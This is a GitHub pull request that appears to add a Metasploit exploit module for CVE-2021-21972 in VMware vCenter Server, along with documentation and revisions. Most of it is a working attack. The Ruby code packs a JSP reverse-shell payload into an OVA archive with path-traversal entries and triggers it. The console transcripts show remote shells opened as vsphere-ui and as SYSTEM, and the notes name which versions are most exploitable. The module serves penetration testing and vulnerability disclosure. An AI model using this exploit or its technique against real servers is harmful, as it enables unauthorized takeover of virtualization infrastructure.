### PR TITLE
Add VMware vCenter Server CVE-2021-21972 exploit

### DIFF
--- a/documentation/modules/exploit/multi/http/vmware_vcenter_uploadova_rce.md
+++ b/documentation/modules/exploit/multi/http/vmware_vcenter_uploadova_rce.md
@@ -127,14 +127,17 @@ msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > run
 
 [*] Started reverse TCP handler on 192.168.123.1:4444
 [*] Executing automatic check (disable AutoCheck to override)
+[*] Using auxiliary/scanner/vmware/esx_fingerprint as check
+[+] 192.168.123.135:443 - Identified VMware vCenter Server 6.7.0 build-11727113
+[*] Scanned 1 of 1 hosts (100% complete)
 [+] The target is vulnerable. Unauthenticated endpoint access granted.
-[*] Uploading OVA file: KCKJuhBJ8tlkS7DSwEc3c881aptw9TKIuI.ova
+[*] Uploading OVA file: O2qAd1Y7t0bhyUQFJ32Vyre6TQHcGoun.ova
 [+] Successfully uploaded OVA file
-[*] Requesting JSP payload: https://192.168.123.135/ui/resources/i6LZZp4k76BXJcdYHGXqqidR2CAo7e.jsp
+[*] Requesting JSP payload: https://192.168.123.135/ui/resources/gVh2ROzD9QyyGNF6.jsp
 [+] Successfully requested JSP payload
-[*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.135:50422) at 2021-03-02 15:14:03 -0600
-[+] Deleted /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/41/0/h5ngc.war/resources/i6LZZp4k76BXJcdYHGXqqidR2CAo7e.jsp
-[+] Deleted /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/40/0/h5ngc.war/resources/i6LZZp4k76BXJcdYHGXqqidR2CAo7e.jsp
+[*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.135:55342) at 2021-03-05 16:49:05 -0600
+[+] Deleted /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/41/0/h5ngc.war/resources/gVh2ROzD9QyyGNF6.jsp
+[+] Deleted /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/40/0/h5ngc.war/resources/gVh2ROzD9QyyGNF6.jsp
 
 id
 uid=1016(vsphere-ui) gid=100(users) groups=100(users),59001(cis)
@@ -149,19 +152,22 @@ Background session 1? [y/N]  y
 ```
 msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > set target 1
 target => 1
-msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > set rhosts 192.168.123.180
-rhosts => 192.168.123.180
+msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > set rhosts 192.168.123.194
+rhosts => 192.168.123.194
 msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > run
 
 [*] Started reverse TCP handler on 192.168.123.1:4444
 [*] Executing automatic check (disable AutoCheck to override)
+[*] Using auxiliary/scanner/vmware/esx_fingerprint as check
+[+] 192.168.123.194:443 - Identified VMware vCenter Server 6.7.0 build-16709044
+[*] Scanned 1 of 1 hosts (100% complete)
 [+] The target is vulnerable. Unauthenticated endpoint access granted.
-[*] Uploading OVA file: 2zckGtDuZm9byeO9k1KYcuqjlubqSm9.ova
+[*] Uploading OVA file: 0ggORbkxAcptUeH6U5S8.ova
 [+] Successfully uploaded OVA file
-[*] Requesting JSP payload: https://192.168.123.180/statsreport/7NYkEScb3HEBnAP9.jsp
+[*] Requesting JSP payload: https://192.168.123.194/statsreport/UQbpAxH7WTmrzqcb7AugtYnMB2z0.jsp
 [+] Successfully requested JSP payload
-[*] Command shell session 2 opened (192.168.123.1:4444 -> 192.168.123.180:49196) at 2021-03-02 15:14:58 -0600
-[!] Tried to delete /ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/7NYkEScb3HEBnAP9.jsp, unknown result
+[*] Command shell session 2 opened (192.168.123.1:4444 -> 192.168.123.194:55411) at 2021-03-05 16:50:29 -0600
+[!] Tried to delete /ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/UQbpAxH7WTmrzqcb7AugtYnMB2z0.jsp, unknown result
 
 
 C:\Program Files\VMware\vCenter Server\perfcharts\wrapper\bin>whoami

--- a/documentation/modules/exploit/multi/http/vmware_vcenter_uploadova_rce.md
+++ b/documentation/modules/exploit/multi/http/vmware_vcenter_uploadova_rce.md
@@ -1,0 +1,172 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits an unauthenticated OVA file upload and path
+traversal in VMware vCenter Server to write a JSP payload to a
+web-accessible directory.
+
+Fixed versions are 6.5 Update 3n, 6.7 Update 3l, and 7.0 Update 1c.
+Note that later vulnerable versions of the Linux appliance aren't
+exploitable via the webshell technique. Furthermore, writing an SSH
+public key to `/home/vsphere-ui/.ssh/authorized_keys` works, but the
+user's non-existent password expires 90 days after install, rendering
+the technique nearly useless against production environments.
+
+You'll have the best luck targeting older versions of the Linux
+appliance. The Windows target should work ubiquitously.
+
+### Setup
+
+Follow [VMware's official
+documentation](https://docs.vmware.com/en/VMware-vSphere/6.7/com.vmware.vcenter.install.doc/GUID-8DC3866D-5087-40A2-8067-1361A2AF95BD.html)
+on installing and configuring vCenter Server, or you can wing it like
+me. The Linux appliance is meant to be deployed via ESXi, but I
+short-circuited the procedure by mounting the ISO and importing the OVA
+directly into VMware Fusion (or your desired hypervisor). YMMV.
+
+```
+wvu@kharak:~/Downloads$ hdiutil attach VMware-VCSA-all-6.7.0-11726888.iso
+/dev/disk2          	                               	/Volumes/VMware VCSA
+wvu@kharak:~/Downloads$ ls -l /Volumes/VMware\ VCSA/vcsa
+total 4621748
+-r-xr-xr-x  1 wvu  staff  2366330368 Jan 10  2019 VMware-vCenter-Server-Appliance-6.7.0.21000-11726888_OVF10.ova
+dr-xr-xr-x  5 wvu  staff        2048 Jan 10  2019 ovftool
+-r-xr-xr-x  1 wvu  staff          52 Jan 10  2019 version.txt
+wvu@kharak:~/Downloads$
+```
+
+If you're using the workaround above, you'll need to connect to port
+5480 to complete [Stage
+2](https://docs.vmware.com/en/VMware-vSphere/6.7/com.vmware.vcenter.install.doc/GUID-CA114526-A413-4219-9FA7-F5A9E9ACA357.html)
+of the faux deployment. The vSphere Client should be accessible on port
+443 after Stage 2 is complete.
+
+You'll want to test versions earlier than 6.7 Update 3l, since that's
+patched. Later vulnerable versions of the Linux appliance aren't
+exploitable via the webshell technique. I haven't been able to download
+and test them all. Sorry.
+
+**Note:** If you're testing on Windows, using Windows Server 2019 will
+fail miserably. Please use [Windows Server 2016 or
+earlier](https://kb.vmware.com/s/article/2091273). It must be Windows
+Server. I can't stress this enough!
+
+**PROTIP:** Removing or otherwise disabling DNS resolution in the Linux
+appliance will make setup run faster if you don't have an FQDN and DNS
+server to back it up. This didn't seem to make a difference on Windows.
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+This targets the Linux appliance with a JSP payload. `VMware vCenter
+Server <= 6.7 Update 1b (Linux)` is supported.
+
+### 1
+
+This targets the Windows install with a JSP payload. `VMware vCenter
+Server <= 6.7 Update 3j (Windows)` is supported.
+
+## Options
+
+### SprayAndPrayMin
+
+Spray JSP payload path starting at this index.
+
+### SprayAndPrayMax
+
+Spray JSP payload path stopping at this index.
+
+## Scenarios
+
+### VMware vCenter Server 6.7 Update 1b (Linux appliance)
+
+```
+msf6 > use exploit/multi/http/vmware_vcenter_uploadova_rce
+[*] Using configured payload java/jsp_shell_reverse_tcp
+msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > options
+
+Module options (exploit/multi/http/vmware_vcenter_uploadova_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       Base path
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (java/jsp_shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+   SHELL                   no        The system shell to use.
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   VMware vCenter Server <= 6.7 Update 1b (Linux)
+
+
+msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > set rhosts 192.168.123.135
+rhosts => 192.168.123.135
+msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > run
+
+[*] Started reverse TCP handler on 192.168.123.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable. Unauthenticated endpoint access granted.
+[*] Uploading OVA file: KCKJuhBJ8tlkS7DSwEc3c881aptw9TKIuI.ova
+[+] Successfully uploaded OVA file
+[*] Requesting JSP payload: https://192.168.123.135/ui/resources/i6LZZp4k76BXJcdYHGXqqidR2CAo7e.jsp
+[+] Successfully requested JSP payload
+[*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.135:50422) at 2021-03-02 15:14:03 -0600
+[+] Deleted /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/41/0/h5ngc.war/resources/i6LZZp4k76BXJcdYHGXqqidR2CAo7e.jsp
+[+] Deleted /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/40/0/h5ngc.war/resources/i6LZZp4k76BXJcdYHGXqqidR2CAo7e.jsp
+
+id
+uid=1016(vsphere-ui) gid=100(users) groups=100(users),59001(cis)
+uname -a
+Linux photon-machine 4.4.161-1.ph1 #1-photon SMP Wed Oct 17 12:15:18 UTC 2018 x86_64 GNU/Linux
+^Z
+Background session 1? [y/N]  y
+```
+
+### VMware vCenter Server 6.7 Update 3j on Windows Server 2016
+
+```
+msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > set target 1
+target => 1
+msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > set rhosts 192.168.123.180
+rhosts => 192.168.123.180
+msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > run
+
+[*] Started reverse TCP handler on 192.168.123.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable. Unauthenticated endpoint access granted.
+[*] Uploading OVA file: 2zckGtDuZm9byeO9k1KYcuqjlubqSm9.ova
+[+] Successfully uploaded OVA file
+[*] Requesting JSP payload: https://192.168.123.180/statsreport/7NYkEScb3HEBnAP9.jsp
+[+] Successfully requested JSP payload
+[*] Command shell session 2 opened (192.168.123.1:4444 -> 192.168.123.180:49196) at 2021-03-02 15:14:58 -0600
+[!] Tried to delete /ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/7NYkEScb3HEBnAP9.jsp, unknown result
+
+
+C:\Program Files\VMware\vCenter Server\perfcharts\wrapper\bin>whoami
+whoami
+nt authority\system
+
+C:\Program Files\VMware\vCenter Server\perfcharts\wrapper\bin>
+```

--- a/modules/exploits/multi/http/vmware_vcenter_uploadova_rce.rb
+++ b/modules/exploits/multi/http/vmware_vcenter_uploadova_rce.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ManualRanking
 
   prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::CheckModule
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
 
@@ -71,7 +72,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultTarget' => 0,
         'DefaultOptions' => {
           'SSL' => true,
-          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
+          'PAYLOAD' => 'java/jsp_shell_reverse_tcp',
+          'CheckModule' => 'auxiliary/scanner/vmware/esx_fingerprint'
         },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -107,6 +109,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
+    # Run auxiliary/scanner/vmware/esx_fingerprint
+    super
+
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/getstatus')

--- a/modules/exploits/multi/http/vmware_vcenter_uploadova_rce.rb
+++ b/modules/exploits/multi/http/vmware_vcenter_uploadova_rce.rb
@@ -1,0 +1,224 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  # "Shotgun" approach to writing JSP
+  Rank = ManualRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'VMware vCenter Server Unauthenticated OVA File Upload RCE',
+        'Description' => %q{
+          This module exploits an unauthenticated OVA file upload and path
+          traversal in VMware vCenter Server to write a JSP payload to a
+          web-accessible directory.
+
+          Fixed versions are 6.5 Update 3n, 6.7 Update 3l, and 7.0 Update 1c.
+          Note that later vulnerable versions of the Linux appliance aren't
+          exploitable via the webshell technique. Furthermore, writing an SSH
+          public key to /home/vsphere-ui/.ssh/authorized_keys works, but the
+          user's non-existent password expires 90 days after install, rendering
+          the technique nearly useless against production environments.
+
+          You'll have the best luck targeting older versions of the Linux
+          appliance. The Windows target should work ubiquitously.
+        },
+        'Author' => [
+          'Mikhail Klyuchnikov', # Discovery
+          'wvu', # Analysis and exploit
+          'mr_me', # Co-conspirator
+          'Viss' # Co-conspirator
+        ],
+        'References' => [
+          ['CVE', '2021-21972'],
+          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0002.html'],
+          ['URL', 'https://swarm.ptsecurity.com/unauth-rce-vmware/'],
+          ['URL', 'https://twitter.com/jas502n/status/1364810720261496843'],
+          ['URL', 'https://twitter.com/_0xf4n9x_/status/1364905040876503045'],
+          ['URL', 'https://twitter.com/HackingLZ/status/1364636303606886403'],
+          ['URL', 'https://kb.vmware.com/s/article/2143838'],
+          ['URL', 'https://nmap.org/nsedoc/scripts/vmware-version.html']
+        ],
+        'DisclosureDate' => '2021-02-23', # Vendor advisory
+        'License' => MSF_LICENSE,
+        'Platform' => ['linux', 'win'],
+        'Arch' => ARCH_JAVA,
+        'Privileged' => false, # true on Windows
+        'Targets' => [
+          [
+            # TODO: /home/vsphere-ui/.ssh/authorized_keys
+            'VMware vCenter Server <= 6.7 Update 1b (Linux)',
+            {
+              'Platform' => 'linux'
+            }
+          ],
+          [
+            'VMware vCenter Server <= 6.7 Update 3j (Windows)',
+            {
+              'Platform' => 'win'
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => true,
+          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+          'RelatedModules' => ['auxiliary/scanner/vmware/esx_fingerprint']
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(443),
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+
+    register_advanced_options([
+      # /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/<index>
+      OptInt.new('SprayAndPrayMin', [true, 'Deployer index start', 40]), # mr_me
+      OptInt.new('SprayAndPrayMax', [true, 'Deployer index stop', 41]) # wvu
+    ])
+  end
+
+  def spray_and_pray_min
+    datastore['SprayAndPrayMin']
+  end
+
+  def spray_and_pray_max
+    datastore['SprayAndPrayMax']
+  end
+
+  def spray_and_pray_range
+    (spray_and_pray_min..spray_and_pray_max).to_a
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/getstatus')
+    )
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check.')
+    end
+
+    # {"States":"[]","Install Progress":"UNKNOWN","Config Progress":"UNKNOWN","Config Final Progress":"UNKNOWN","Install Final Progress":"UNKNOWN"}
+    expected_keys = [
+      'States',
+      'Install Progress',
+      'Install Final Progress',
+      'Config Progress',
+      'Config Final Progress'
+    ]
+
+    unless res.code == 200 && (expected_keys & res.get_json_document.keys) == expected_keys
+      return CheckCode::Safe('Unauthenticated endpoint access denied.')
+    end
+
+    CheckCode::Vulnerable('Unauthenticated endpoint access granted.')
+  end
+
+  def exploit
+    upload_ova
+    pop_thy_shell # ;)
+  end
+
+  def upload_ova
+    print_status("Uploading OVA file: #{ova_filename}")
+
+    multipart_form = Rex::MIME::Message.new
+    multipart_form.add_part(
+      generate_ova,
+      'application/x-tar', # OVA is tar
+      'binary',
+      %(form-data; name="uploadFile"; filename="#{ova_filename}")
+    )
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/uploadova'),
+      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
+      'data' => multipart_form.to_s
+    )
+
+    unless res && res.code == 200 && res.body == 'SUCCESS'
+      fail_with(Failure::NotVulnerable, 'Failed to upload OVA file')
+    end
+
+    register_files_for_cleanup(*jsp_paths)
+
+    print_good('Successfully uploaded OVA file')
+  end
+
+  def pop_thy_shell
+    jsp_uri =
+      case target['Platform']
+      when 'linux'
+        normalize_uri(target_uri.path, "/ui/resources/#{jsp_filename}")
+      when 'win'
+        normalize_uri(target_uri.path, "/statsreport/#{jsp_filename}")
+      end
+
+    print_status("Requesting JSP payload: #{full_uri(jsp_uri)}")
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => jsp_uri
+    )
+
+    unless res && res.code == 200
+      fail_with(Failure::PayloadFailed, 'Failed to request JSP payload')
+    end
+
+    print_good('Successfully requested JSP payload')
+  end
+
+  def generate_ova
+    ova_file = StringIO.new
+
+    # HACK: Spray JSP in the OVA and pray we get a shell...
+    Rex::Tar::Writer.new(ova_file) do |tar|
+      jsp_paths.each do |path|
+        # /tmp/unicorn_ova_dir/../../<path>
+        tar.add_file("../..#{path}", 0o644) { |jsp| jsp.write(payload.encoded) }
+      end
+    end
+
+    ova_file.string
+  end
+
+  def jsp_paths
+    case target['Platform']
+    when 'linux'
+      @jsp_paths ||= spray_and_pray_range.shuffle.map do |idx|
+        "/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/#{idx}/0/h5ngc.war/resources/#{jsp_filename}"
+      end
+    when 'win'
+      # Forward slashes work here
+      ["/ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/#{jsp_filename}"]
+    end
+  end
+
+  def ova_filename
+    @ova_filename ||= "#{rand_text_alphanumeric(8..42)}.ova"
+  end
+
+  def jsp_filename
+    @jsp_filename ||= "#{rand_text_alphanumeric(8..42)}.jsp"
+  end
+
+end

--- a/modules/exploits/multi/http/vmware_vcenter_uploadova_rce.rb
+++ b/modules/exploits/multi/http/vmware_vcenter_uploadova_rce.rb
@@ -116,20 +116,27 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown('Target did not respond to check.')
     end
 
-    # {"States":"[]","Install Progress":"UNKNOWN","Config Progress":"UNKNOWN","Config Final Progress":"UNKNOWN","Install Final Progress":"UNKNOWN"}
-    expected_keys = [
-      'States',
-      'Install Progress',
-      'Install Final Progress',
-      'Config Progress',
-      'Config Final Progress'
-    ]
+    case res.code
+    when 200
+      # {"States":"[]","Install Progress":"UNKNOWN","Config Progress":"UNKNOWN","Config Final Progress":"UNKNOWN","Install Final Progress":"UNKNOWN"}
+      expected_keys = [
+        'States',
+        'Install Progress',
+        'Install Final Progress',
+        'Config Progress',
+        'Config Final Progress'
+      ]
 
-    unless res.code == 200 && (expected_keys & res.get_json_document.keys) == expected_keys
-      return CheckCode::Safe('Unauthenticated endpoint access denied.')
+      if (expected_keys & res.get_json_document.keys) == expected_keys
+        return CheckCode::Vulnerable('Unauthenticated endpoint access granted.')
+      end
+
+      CheckCode::Detected('Target did not respond with expected keys.')
+    when 401
+      CheckCode::Safe('Unauthenticated endpoint access denied.')
+    else
+      CheckCode::Detected("Target responded with code #{res.code}.")
     end
-
-    CheckCode::Vulnerable('Unauthenticated endpoint access granted.')
   end
 
   def exploit


### PR DESCRIPTION
## If you must use a raw link, use [this one](https://raw.githubusercontent.com/wvu-r7/metasploit-framework/feature/vcenter/modules/exploits/multi/http/vmware_vcenter_uploadova_rce.rb). It's linked to the branch, not a specific commit, so you'll get updates if you refresh.

```
msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) > info

       Name: VMware vCenter Server Unauthenticated OVA File Upload RCE
     Module: exploit/multi/http/vmware_vcenter_uploadova_rce
   Platform: Linux, Windows
       Arch: java
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Manual
  Disclosed: 2021-02-23

Provided by:
  Mikhail Klyuchnikov
  wvu <wvu@metasploit.com>
  mr_me
  Viss

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   VMware vCenter Server <= 6.7 Update 1b (Linux)
  1   VMware vCenter Server <= 6.7 Update 3j (Windows)

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      443              yes       The target port (TCP)
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       Base path
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an unauthenticated OVA file upload and path
  traversal in VMware vCenter Server to write a JSP payload to a
  web-accessible directory. Fixed versions are 6.5 Update 3n, 6.7
  Update 3l, and 7.0 Update 1c. Note that later vulnerable versions of
  the Linux appliance aren't exploitable via the webshell technique.
  Furthermore, writing an SSH public key to
  /home/vsphere-ui/.ssh/authorized_keys works, but the user's
  non-existent password expires 90 days after install, rendering the
  technique nearly useless against production environments. You'll
  have the best luck targeting older versions of the Linux appliance.
  The Windows target should work ubiquitously.

References:
  https://cvedetails.com/cve/CVE-2021-21972/
  https://www.vmware.com/security/advisories/VMSA-2021-0002.html
  https://swarm.ptsecurity.com/unauth-rce-vmware/
  https://twitter.com/jas502n/status/1364810720261496843
  https://twitter.com/_0xf4n9x_/status/1364905040876503045
  https://twitter.com/HackingLZ/status/1364636303606886403
  https://kb.vmware.com/s/article/2143838
  https://nmap.org/nsedoc/scripts/vmware-version.html

Related modules:
  auxiliary/scanner/vmware/esx_fingerprint

msf6 exploit(multi/http/vmware_vcenter_uploadova_rce) >
```

Resolves #14803.